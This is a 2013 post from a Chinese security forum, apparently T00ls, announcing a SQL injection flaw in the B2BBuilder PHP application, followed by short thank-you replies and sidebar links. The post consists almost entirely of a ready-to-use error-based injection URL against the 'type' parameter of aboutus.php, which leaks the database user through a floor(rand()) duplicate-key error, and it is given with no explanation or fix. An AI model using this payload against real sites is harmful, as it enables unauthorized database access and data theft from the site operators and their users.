[我爱t00ls] B2BBuilder 注入漏洞

2013-09-05 01:37:59 17 xiaoxiaoabc 4217

最近工作好忙,这不有时间了,看看php代码,不能生锈呢.

直接上利用方式,大家一看就懂.

http://localhost/b2b/aboutus.php?type=12345'  aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and 'z'='z

类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

xiaoxiaoabc

评论17次

要评论？请先登录或注册

17楼

krystalvip
2016-7-8 18:36

收藏了，感谢楼主

回复|@ta|踩(0)|顶(0)
16楼

xia1234
2013-9-28 16:08

这个可以有。

回复|@ta|踩(0)|顶(0)
15楼

dullub
2013-9-27 23:06

为啥这套程序都下载下来啊

回复|@ta|踩(0)|顶(0)
14楼

—7℃
2013-9-10 18:45

看完了，就得回复下

回复|@ta|踩(0)|顶(0)
13楼

ji4nr3n
2013-9-10 18:26

感谢作者的无私奉献

回复|@ta|踩(0)|顶(0)
12楼

cc4ss
2013-9-10 17:12

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
11楼

kk_skipper
2013-9-7 09:08

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
10楼

yantou
2013-9-6 21:09

收了谢谢啊

回复|@ta|踩(0)|顶(0)
9楼

xiaoxiaoabc
2013-9-5 21:07

mlgb

回复|@ta|踩(0)|顶(0)
8楼

lmy
2013-9-5 19:34

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
7楼

cnxxxxcn
2013-9-5 15:21

这个可以呵呵~~~

回复|@ta|踩(0)|顶(0)
6楼

Yaseng
2013-9-5 15:05

支持下lz

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2013-9-5 10:29

呵呵，支持一下、、、、

回复|@ta|踩(0)|顶(0)
4楼

uuwhat
2013-9-5 09:01

感谢

回复|@ta|踩(0)|顶(0)
3楼

twygame
2013-9-5 08:56

牛BB的人啊。。求带。

回复|@ta|踩(0)|顶(0)
2楼

hiicome
2013-9-5 06:36

收下了。都不错的

回复|@ta|踩(0)|顶(0)
1楼

52pride
2013-9-5 02:02

沙发

回复|@ta|踩(0)|顶(0)

安全资讯MongoDB 存在严重未经身份验证的漏洞，可通过 zlib 压缩泄露敏感数据

漏洞通报：MongoDB 严重安全漏洞 (CVE-2025-14847)一个编号为 CV ...

2025-12-25 10:06:03 6 1179

安全资讯开源编辑器Notepad++更新程序存在安全漏洞被劫持流量投毒请用户注意杀毒和更新

开源文本和代码编辑器 Notepad++ 日前被安全专家发现安全漏洞， ...

2025-12-12 16:51:19 8 1431

安全资讯破局者河图：专攻“疑难杂症”的实战派创业逻辑【T00ls人物专访第二十一期】

>追风赶月莫停留，平芜尽处是春山 ### 自我介绍我是河图，香港墨 ...

2025-12-19 14:59:28 10 1429

安全资讯专访xiya：从破解到构建，一名团队负责人的安全观【T00ls人物专访第十九期】

### 自我介绍大家好，我是陈博（ID：xiya），目前就职于启明星辰 ...

2025-11-07 14:57:03 11 2642

安全资讯中国最大的安全公司 knounsec 遭到黑客攻击

泄露的信息包括有关网络武器的信息、内部黑客工具的完整源代码以 ...

2025-11-14 09:58:34 11 2002

精华推荐

渗透测试Tomcat内存马学习

## 前言文章字数有点多，由于是md记录的，所以这里以MarkDown格 ...

2025-01-21 16:53:34 24 1753

手机无线我是如何在不接触他人饭卡的情况下复制全校同学的饭卡

表弟才疏学浅，并且刚刚接触RFID。文章是以一个新手的视角来写的 ...

2016-06-30 09:52:39 63 1036

Web安全从偶遇Flarum开始的RCE之旅

> 应oldjun的邀请，分享一篇近期新写的文章~> > 事先声明：本次 ...

2022-08-29 20:54:35 30 1540

CTF研究PHP反序列化入门之常见魔术方法

## PHP常见魔术方法在学习PHP反序列化知识前，我们需要先了解一 ...

2019-02-01 21:13:59 2 467

渗透测试Java 安全 | 反序列化 URLDNS+CC+自己挖一条链+CB

## 前言如同标题一样, 本篇文章会介绍反序列化漏洞的基本原理， ...

2024-11-28 11:04:04 1 514

Top ↑

[我爱t00ls] B2BBuilder 注入漏洞

关于作者

评论17次

收藏了，感谢楼主

这个可以有。

为啥这套程序都下载下来啊

看完了，就得回复下

感谢作者的无私奉献

支持原创，谢谢分享。

支持原创，谢谢分享。

收了谢谢啊

mlgb

支持原创，谢谢分享。

这个可以 呵呵~~~

支持下lz

呵呵，支持一下、、、、

感谢

牛BB的人啊。。求带。

收下了。都不错的

沙发

热门文章

安全资讯MongoDB 存在严重未经身份验证的漏洞，可通过 zlib 压缩泄露敏感数据

安全资讯开源编辑器Notepad++更新程序存在安全漏洞被劫持流量投毒 请用户注意杀毒和更新

安全资讯破局者河图：专攻“疑难杂症”的实战派创业逻辑【T00ls人物专访第二十一期】

安全资讯专访xiya：从破解到构建，一名团队负责人的安全观【T00ls人物专访第十九期】

安全资讯中国最大的安全公司 knounsec 遭到黑客攻击

最新回复

精华推荐

渗透测试Tomcat内存马学习

手机无线我是如何在不接触他人饭卡的情况下复制全校同学的饭卡

Web安全从偶遇Flarum开始的RCE之旅

CTF研究PHP反序列化入门之常见魔术方法

渗透测试Java 安全 | 反序列化 URLDNS+CC+自己挖一条链+CB

这个可以呵呵~~~

安全资讯开源编辑器Notepad++更新程序存在安全漏洞被劫持流量投毒请用户注意杀毒和更新